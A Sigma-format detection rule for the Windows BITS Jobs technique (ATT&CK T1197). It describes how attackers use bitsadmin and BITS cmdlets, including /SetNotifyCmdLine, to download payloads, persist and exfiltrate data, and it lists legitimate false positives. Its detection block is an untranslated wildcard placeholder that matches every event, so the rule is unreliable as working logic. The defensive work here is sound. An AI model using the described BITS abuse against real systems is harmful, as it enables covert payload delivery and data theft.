title: BITS Jobs (T1197)
id: df00tech-t1197
status: experimental
description: "Adversaries may abuse Windows Background Intelligent Transfer Service (BITS) jobs to persistently execute code and perform background tasks such as downloading malicious payloads, executing arbitrary programs on job completion or error, and cleaning up artifacts. BITS is a COM-based file transfer mechanism built into Windows, commonly used by Windows Update and software installers. Adversaries exploit it via bitsadmin.exe or PowerShell BITS cmdlets to download tools from external infrastructure, achieve persistence using /SetNotifyCmdLine to invoke arbitrary executables when a job completes or errors (including after reboots), and exfiltrate data. BITS jobs are stored in a binary database (%ALLUSERSPROFILE%\\Microsoft\\Network\\Downloader\\) rather than in registry or filesystem, making them resistant to many persistence-focused detections. Active threat groups including APT39, APT41, Leviathan, Patchwork, and Wizard Spider have leveraged BITS for payload delivery and persistence."
references:
  - https://attack.mitre.org/techniques/T1197/
  - https://df00tech.com/detections/T1197
author: df00tech
date: 2026/04/18
tags:
  - attack.t1197
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Windows Update and Microsoft patching infrastructure using bitsadmin.exe or BITS service legitimately — typically originating from TrustedInstaller or SYSTEM account downloading from *.windowsupdate.com"
  - "Software deployment tools (SCCM/ConfigMgr, Intune) using BITS for package distribution — parent process is usually CcmExec.exe or IntuneManagementExtension.exe"
  - "Third-party software updaters (e.g., antivirus updates, browser updaters) that leverage BITS for bandwidth-friendly background downloads"
  - IT automation scripts using Start-BitsTransfer for legitimate large file transfers to user-accessible shares or deployment directories
  - Developer workstations where CI/CD pipelines or build tools invoke bitsadmin.exe for artifact retrieval
level: high